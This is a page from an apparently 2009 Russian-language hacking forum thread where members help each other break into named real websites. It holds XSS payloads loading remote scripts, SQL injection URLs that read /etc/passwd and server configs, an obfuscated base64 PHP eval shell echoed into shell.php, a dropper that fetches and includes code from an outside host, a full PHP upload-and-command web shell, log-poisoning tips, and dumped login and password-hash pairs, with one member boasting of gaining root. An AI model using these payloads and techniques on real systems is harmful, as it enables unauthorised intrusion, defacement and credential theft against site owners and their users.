PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

JOHNik
26.07.2009, 20:51
после того как пытаешся зарег-тся под ником
"><script>alert("xss")</script>
скрипт проверяет его длину (от 4 до 20 символов).
если его длина не входит в рамки ограничений то выводит к примеру
ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит
htmlspecialchars()) имеет длину больше 20 символов.
>>Из кода ясно что переменная не передаеться не как POST не как GET
данные передаються методом POST
<form method="POST"
>>И что получаеться это и вовсе не уязвимость ?
уязвимость но с нее в данном случае толку 0

Я вобще тут никакой сложности не вижу
http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
прекрасно работает! :)

wolmer
27.07.2009, 18:07
Всем здрасти...
Есть скул
При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1

Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'

(1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)

При заменне плюсеков на пробелы вылазиет след. ошибка:

1109 - Unknown table 'pd' in field list

(значит внедрение запроса по идее возможно)

Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает

Ctacok
27.07.2009, 20:56
Может быть int();
Или жёсткая фильтрация.
Скорее всего 2.

L I G A
27.07.2009, 21:44
Я вобще тут никакой сложности не вижу
http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
прекрасно работает! :)
какой сложности?для тех кто в танке: я писал о том почему алерт вылазит,и предположил что данные принимаются постом.
но Пако капнул дальше и построив опрделеннный запрос опредилил что данные принимаются через REQUEST(ну или регистр глобалс).

Ctacok
28.07.2009, 09:08
Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo :)

nub-hacker
28.07.2009, 09:20
Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo :)

я всё правильно делал,просто описался. ты хоть сам бы по пробовал залить прежде чем писать.

Flair
28.07.2009, 11:11
какая связка сплоитов щас актуальней?

Pashkela
28.07.2009, 12:54
nub-hacker

потом

пытаюсь открыть

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

нифига не раб. помогите плиз.


почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке:

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>"

Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ.

Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия:

1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули.

2. Папка должна быть доступна на запись

ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php

HAXTA4OK
28.07.2009, 13:03
:O мой пост и мою скуль крутишь ;)

1)load_file - это чтение исходного кода файла
2)+into+DUMPFILE+'/tmp/phpinfo.php'-- что бы это использовать надо иметь тебе инклуд

nub-hacker
28.07.2009, 13:16
Pashkela, спасибо огромное, что так подробно разяснил. буду искать путь в web.

HAXTA4OK,спс за скулю. побольше бы рутовских ;)

HAXTA4OK
28.07.2009, 13:17
P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
если не жалко то закройте тему с этой скулей :)

P.S.S

за 3 минуты мой рекорд :D нашел и путь и залил шелл

uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM

mailbrush
28.07.2009, 13:26
если не жалко то закройте тему с этой скулей
Нельзя так... Если ты успел - сразу закрывать, да?

nub-hacker
28.07.2009, 13:34
P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
если не жалко то закройте тему с этой скулей :)

P.S.S

за 3 минуты мой рекорд :D нашел и путь и залил шелл

uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM


Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.

HAXTA4OK
28.07.2009, 13:36
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9--

ищи тута ;)

nub-hacker
28.07.2009, 13:55
Ура. первый раз в жизни залил шелл через SQL. кстати там прав на запись нет. так что лейте шеллы, но деф не сделаеете )))

Pashkela
28.07.2009, 16:13
Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.


А он там и не прокатит, там каждый раз содержание запроса в сорцах есть, надо доделывать и под такие ситуации

HAXTA4OK
28.07.2009, 16:15
а вот брутить иногда надо))то что я тебе дал путь , это чисто повезло что с 3 раза нашел конфиг файл))

The_HuliGun
28.07.2009, 16:47
Раз ушо на то пошло.
К теме nub-hacker
uid=0(root) gid=0(root) groups=48(apache) context=root:system_r:initrc_t
в /tmp лежит сплоит.

SeNaP
28.07.2009, 17:17
1 file_priv (возможность чтения/записи файлов)
Проверяется это так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
'имя юзера'- это имя того юзера под которым работает база, т.е. то, что выводится по запросу:
union+select+user()
но без хоста. Тоесть если вывело root@localhost, то юзер root
Значения два, либо "Y"-повезло, либо "N", соответственно неповезло
Можно не заморачиваться и сразу попробовать прочитать файл:
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если вывело, нужные привелегии у вашего юзера есть
Как я понял это для БД версии 4
А как проверить в 5-ой версии?

Pashkela
28.07.2009, 17:26
тоже самое, только на мой взгляд, чтобы не заморачиваться, правильнее делать так:

load_file(0x2f6574632f706173737764) - если linux

или

load_file(0x633a2f626f6f742e696e69) - если win

т.к. magic_quotes может быть ON.

ЗЫЖ
1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал
2. Если user() не root - это еще ничего не значит. Каждый 30-ый примерно все равно имеет file_priv=Y (т.е. проверять надо всех подряд, любую скулю)

SeNaP
28.07.2009, 17:37
Pashkela, спасбо.

load_file не хочет работать, ошибку выдает.
Можно ли как нибуть проверить , чтобы уточнить есть ли парва на чтение и запись файлов у юзера в БД 5 версии?
Ну чтобы выводило Y или N

Jokester
28.07.2009, 17:41
SeNaP
Так как ты написал
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'

если маджики включены, то перевести в hex, а с лоад_файл это не вполне точный метод, бывают ньюансы


1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал

Это врятли

Pashkela
28.07.2009, 18:21
jokester:

Это врятли



http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,user()+from+mysql.user/*

Ответ: tltltl@info.umb.edu

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Ответ: N

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,load_file('/etc/passwd')/*

Ответ: содержимое /etc/passwd

---------------------------------------------------------------------------------------
Или еще может быть такая ситуация:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,file_priv,3,4,5,6+from+mysql.use r--

Ответ: Couldn't execute query

Но запрос:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,load_file('/etc/passwd'),3,4,5,6--

- положительный

Ну хз, может я чего не понимаю

По поводу пункта 1 пример:

http://www.kasparov.ru/subject.php?id=-74'+union+select+user()+from+mysql.user/*

Ответ: editor@192.168.1.70

http://www.kasparov.ru/subject.php?id=-74'+union+select+file_priv+from+mysql.user+where+u ser()='editor@192.168.1.70'/*

Ответ: Y

http://www.kasparov.ru/subject.php?id=-74'+union+select+load_file('/etc/httpd/conf/httpd.conf')/*

Ответ: содержимое /etc/httpd/conf/httpd.conf (в сорцах)

The_HuliGun
28.07.2009, 18:30
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Звезды говорят о другом...

User name: tltltl@info.umb.edu
Fields user:password:file_Priv:host
[43]:tltltl:2e52490f15206ead:Y:%

Вот так
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user+ where+user='tltltl'/*

Pashkela
28.07.2009, 18:33
))) Ок, был неправ, погорячился:)))

Всегда надо юзать where user=, а лучше не заморачиваться и сразу load_file:)

Jokester
28.07.2009, 18:50
Pashkela ты издеваешься что-ли?

Как по твоему что выводит этот запрос?
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Pashkela
28.07.2009, 18:57
Ааааа, я больше не буду:))) Просто большиство, насколько я знаю, where не пользуют, поэтому и привёл пример, для наглядности

Jokester
28.07.2009, 19:02
Без where как раз это не имеет смысла делать. Непонятно что за запись тебе выдаст база.

Ну или хотя-бы concat_ws(0x3a,user,file_priv) а там уже искать своего юзера

Qwazar
28.07.2009, 19:38
select file_priv from mysql.user where user=substring_index(user(),0x40,1) and host=substring_index(user(),0x40,-1)

bons
29.07.2009, 02:56
http://censor.net.ua/go/offer/ResourceID/12235-4.html
http://censor.net.ua/go/offer/ResourceID/12231.html
совпадают, то есть вроде как признак sql инъекции. Но более ничего не подтверждает это. Возможно ли тут запроса внедрение?

Tigger
29.07.2009, 04:00
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0

Ctacok
29.07.2009, 06:42
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0
ftp
http://www.codenet.ru/webmast/php/PHP-Ftp.php
А здесь хорошо всё описывается.

nub-hacker
29.07.2009, 09:26
Вот взял чужую пхп инъекцию http://forum.antichat.ru/showpost.php?p=1414940&postcount=940


Обясните мне плиз. я не понял каким он образом сформировал /etc/passwd

в этот бред. /cte/=htap_elif;dwssap=eman_elif

Мне надо понять, плиз.

ЗЫ. с меня +++

HAXTA4OK
29.07.2009, 09:54
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0

я так понял что ты залил '<?php eval($_GET[cmd]);?>' да? елси это так то пробуй залить локальный аплоад =)

Scipio
29.07.2009, 10:02
/cte/=htap_elif;dwssap=eman_elif
/cte/ это /etc/ задом на перед
=htap_elif; просто чтобы было
dwssap это passwd наоборот
eman_elif чтобы было
другими словами
/cte/=htap_elif;dwssap=eman_elif это file_name=passwd;file_path=/etc/ только задом на перед

Tigger
29.07.2009, 10:59
HAXTA4OK, как мне его залить? о_0 Все функции заливки запрещены. Удаленный инклюд не пашет.

HAXTA4OK
29.07.2009, 11:09
так ты мне скажи что у тебя вообще щас там есть из твоего что ты залил?


P.S если щас речь про <php eval> то !

КАК ТЫ ЗАЛИВАЛ ЭТОТ ЕВАЛ КОД ЧЕРЕЗ into+outfile , точно так же , только вместо <php eval> лей форму локального аплоада!!!

The_HuliGun
29.07.2009, 11:48
Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0

Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZ RkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6v ooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N 9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5 m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnA C4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9f AymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j 4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt 2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80y SsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsR eT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLK PazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93 rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQ AfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51Fh RagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUr i0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZ vPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95 RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bic EE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTd KWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1y un1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC 6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96Sw bYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1Ot FiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOn LWeX7VA718="))); ?>' > shell.php
согласен с постом выше, всегда так делал, всегда прокатывало.

mailbrush
29.07.2009, 11:56
Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.

nemaniak
29.07.2009, 11:58
Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZ RkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6v ooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N 9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5 m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnA C4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9f AymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j 4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt 2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80y SsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsR eT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLK PazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93 rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQ AfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51Fh RagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUr i0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZ vPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95 RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bic EE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTd KWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1y un1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC 6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96Sw bYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1Ot FiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOn LWeX7VA718="))); ?>' > shell.php
согласен с постом выше, всегда так делал, всегда прокатывало.

но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...

The_HuliGun
29.07.2009, 11:59
Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.

Ппц гуру, где твоя хакерская догадка, откуда он знает что нет качалок, в ssh не работает echo?, в ssh проще уже через ftp клиент подцепить его.

The_HuliGun
29.07.2009, 12:03
но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...

Размер етого шелла- 3.8кб, ради интереса посмотрел, криптованый-1.9КБ, если что-то может помешать то ето Warning: gzinflate(), но ето бывает 2:10

Есть испольнения комманд и аплоадер файлов.

Tigger
29.07.2009, 12:16
Выполняю команды через логи. Проверил все мне известные, нифига. Сейчас попробую то, что вы тут насоветывали ;)

mailbrush
29.07.2009, 12:21
откуда он знает что нет качалок
which wget... which lynx, etc...

Tigger
29.07.2009, 12:22
твою ж мать =\
Fatal error: Call to undefined function: gzinflate() in
А без него разумеется не хочет...

$n@ke
29.07.2009, 12:23
ну праильно, судя по тому, что качалок нет - можно было понять что присутствие gzinflate маловероятно ))
лей обычный шелл.

Tigger
29.07.2009, 12:26
в смысле лить обычный шелл? у меня есть LFI, нашел логи, там выполнял команды... в смысле лить обычный шелл? о_0

Jokester
29.07.2009, 12:26
Tigger
allow_url_fopen on\off ?

copy() никто не отменял

The_HuliGun
29.07.2009, 12:36
Я еще пользовался такой фишкой, когда небыло качалок и удаленных инклудов:

<?php
if (isset($_GET[p]))
{
$f=fopen('/tmp/qwerty','w+');
fwrite($f,file_get_contents('http://www.youhost/upl.inc'));
}
include('/tmp/qwerty');
?>

Надеюсь понятно. залей на хост upl.inc, той что я тебе советол через echo, и етот скрипт через есho бросай на серв, дожно проканать=)

В том аплоадере просто хтмл код, нужно было закриптовать.., а так посредствами php можно будет стянуть и проинклудить локально.
shell.php?p

По теме, пускай буде, если вдруг кому нибудь пригодится. Больше ничем не могу помочь по даному вопросу.
upl.inc:

<html>
<head>
<title>uploader</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
a { color: #000000; text-decoration: none}
a:hover { color: #000066; text-decoration: underline}
-->
</style>
</head>

<body bgcolor="#999999" text="#000000">
<center>
<table width="700" border="0" bgcolor="#000066">
<tr>
<td>
<table width="100%" border="0" bgcolor="#CCCCCC">
<tr>
<td>
<p><font size="2"><b><font color="#FF0000">&nbsp;&nbsp;&nbsp;System:
<font color="#000000">
<? passthru("uname -a"); ?>
</font><br>
&nbsp;&nbsp;&nbsp;Our permissions: <font color="#000000">
<? passthru("id"); ?>
</font><br>
&nbsp;&nbsp;&nbsp;Our locality: <font color="#000000">
<? passthru("pwd"); ?>
</font></font></b></font></p>

<pre>
<?php

// FILE UPLOAD
$uploaded = $_FILES['userfile']['tmp_name'];
if (file_exists($uploaded)) {
$pwd_dir = $_POST['dira'];
$real = $_FILES['userfile']['name'];
$destination = $pwd_dir."/".$real;
copy($uploaded, $destination);
echo "Uploaded process:";
print_r ($_FILES);
echo "FILE UPLOADED TO $destination";
} else {
echo "&nbsp;&nbsp;No file uploaded";
}
?> </pre> <form name="form1" method="post" enctype="multipart/form-data">
<table width="100%" border="0">
<tr>
<td width="35%"><font size="2"><b>&nbsp;&nbsp;Browse file
to upload:</b></font></td>
<td width="65%">
<input type="file" name="userfile" size="45">
</td>
</tr>
<tr>
<td width="35%"><b><font size="2">&nbsp;&nbsp;Destination:</font></b></td>
<td width="65%">
<input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="upload">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%">&nbsp; </td>
</tr>
<tr>
<td width="35%"><b><font size="2">&nbsp;&nbsp;Command to execute:</font></b></td>
<td width="65%">
<input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
<input type="submit" name="submit" value="execute">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%">&nbsp; </td>
</tr>
</table>
</form>
<p>
<pre>
<?
// command output
if ($_POST['cmd']){
$cmd = stripslashes($_POST['cmd']);
echo "$cmd executed...<br>";
passthru("$cmd");
}
else {
echo "No shell command executed";
}

?></pre>



<div align="right"> <font size="1"><b>2003 &copy; </b></font> </div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</body>
</html>

Tigger
29.07.2009, 13:24
jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...

Хулиган, тебя я немного не понял.

The_HuliGun
29.07.2009, 13:29
Заливай upl.inc на левый хост
Через echo заливай етот скрипт

<?php
if (isset($_GET[p]))
{
$f=fopen('/tmp/qwerty','w+');
fwrite($f,file_get_contents('http://www.левый-хост/upl.inc'));
}
include('/tmp/qwerty');
?>

потом
shell.php?p

Flair
29.07.2009, 13:56
есть админка, вроде самописная, так же имеется логин и пас к ней, но при попытке войти выдает что нельзя зайти с данного ip.
Вопрос как возможно обойти ето дрянь, можно ли подменить IP на IP администратора сайта

mailbrush
29.07.2009, 14:02
Экстрасенсов здесь нет. Мы не знаем каким способом проверяется IP. Если типа
#....
if($_SERVER['REMOTE_ADDR']==$trueip)
$welcome=true; else
$welcome=false;
#....Не подменить никак...
Ну а если включены регистер_глобался, т.е. ключ => значение массива $_GLOBALS будет равно названию => значению переменной, и IP берется с названия этой переменной, тогда просто в GET/POST/COOKIE подставь ip(название переменной)=0.0.0.0(админский IP).

Повторю, экстрасенсов здесь нет.

Flair
29.07.2009, 14:07
а как узнать как он проверяется?

mailbrush
29.07.2009, 14:09
а как узнать как он проверяется?Взглянуть в сорсы :)

Jokester
29.07.2009, 14:17
jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...


Так не бывает.
Давай сюда
1. Что прописано в логах (через что ты выполняешь комманды. КОД)
2. phpinfo() директивы
allow_url_fopen
allow_url_include
magic_quotes_gpc
safe_mode
disable_functions
3. ls -lia (ты-же как-то качалки искал, значит возможно)
4. Как ты пытаешься залить через copy (полностью)

ph1l1ster
29.07.2009, 14:29
Взглянуть в сорсы :)

Или методом тыка :) Попробуй подменить x_forwarder_for, хотя сейчас уже мало где проверяют так, но всё же... :)

Krist_ALL
29.07.2009, 18:33
В статье электа написано про то, что если в значение сессион ид вставить спецсимволы,то будет ошибка и раскрытие путей. Как защитится от этого? Спрашивал очень многих, никто ничего сказать не смог.

mailbrush
29.07.2009, 18:43
Фильтруй регулярками.

[Raz0r]
29.07.2009, 18:44
@session_start();

Велемир
29.07.2009, 19:51
Вопрос:

Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

Как же это замутить ))

ph1l1ster
29.07.2009, 19:57
Вопрос:

Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

Как же это замутить ))

Уязвимости php 5.2 ?? :)

http://www.xakep.ru/vulnerability/PHP/

Ctacok
29.07.2009, 20:09
Вопрос:

Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

Как же это замутить ))
http://milw0rm.com/exploits/7646

HAXTA4OK
29.07.2009, 20:24
function affiliates_banners_edit_verify()
{
global $txt, $smcFunc, $sourcedir, $board_info, $board, $selected_boards;

// Check Permission for Admin and Affiliates Manager
if (!allowedTo('affiliates_manage'))
fatal_lang_error('affiliates_no_permission', false);

// We need an ID!!
if (empty($_REQUEST['id']))
fatal_lang_error('banners_no_selected', false);

// Check the banner
$bannerimage = htmlspecialchars($_REQUEST['bannerimage'], ENT_QUOTES);
$banner_id = $_REQUEST['id'];

if (empty($bannerimage))
fatal_lang_error('banner_no_image',false);

$smcFunc['db_query']('', "
UPDATE {db_prefix}affiliates_banners
SET image = '$bannerimage'
WHERE id_banner = $banner_id LIMIT 1");

// Please redirectme to the new banner
redirectexit('action=affiliates;sa=banners');
}
people,тут же есть вроде инъект,и как мне его с UPDATE реализовать?

P.S. просто уже мозг кипит

Scipio
29.07.2009, 20:54
script.php?bannerimage=asd&id=1 and 1=(if(1=1,1,(select 1 union select 2)))
мож так, не проверял да и от многих факторов зависит

Tigger
29.07.2009, 21:43
jokester
1) Выполнял запросы через /proc/self/environ. PHP код писал в User-Agent.
2) allow_url_fopen = 1
allow_url_include = в phpinfo его вообще нету
magic_quotes_gpc = 1
safe mode = 0
disable_functions = no value
3) ls -la пашет, проверил /tmp - все норм.
4) <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
когла понял, что стоит мк, пробывал так:
<?php copy(base64_decode(blabla)); ?>
-----------------------------------------------------------

Мне Grey уже помог с шеллом, но нихуя не объяснил. Он залил как-то вручную через пакету, но не суть...

jokester, был бы рад услышать твой совет... )

P.S.
Я знаю, что в чем-то не прав =\

Scipio
29.07.2009, 22:02
в User-Agent пропиши
<? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
magic_quotes_gpc действует только на gpc те. на _REQUEST а на User-Agent не распространяется

Jokester
29.07.2009, 22:10
Tigger

Если allow_url_include в phpinfo нет, то версия пыха, как я понимаю четвёртая. Тут будет работать и инклуд удалённый скорее всего, ну а copy() уж 100%.

Проблема только в кавычках. А вариантов масса. Я-же не зря спрашивал какой код ты пишешь. Именно КОД.
Одно дело если это например <? system($_GET[cmd]); ?> совсем другое если <?php eval($_REQUEST[ev]); ?> или например <?php include($_REQUEST[c]); ?> Туда ведь можно записать много чего, подумай, я думаю запросто найдёшь ещё парочку. :)

Я просто предполагаю, что Грей не просто так не объяснил, он любит по этой тематике задачки давать, поэтому фишек палить не буду, хотя они все в паблике, найдёшь без проблем

L I G A
29.07.2009, 22:15
такое дело :

вывожу записи лимитом,движок сайта сабдример.
http://сайт.ру/catalog/index.php?category=-2+union+select+1,concat(0x3a,login,pass),3,4,5,6,7 +from+pmd_users+limit+1,0--

вылазит такое :
login1821165f4dcc3b5aa765d61d8327deb882cf99

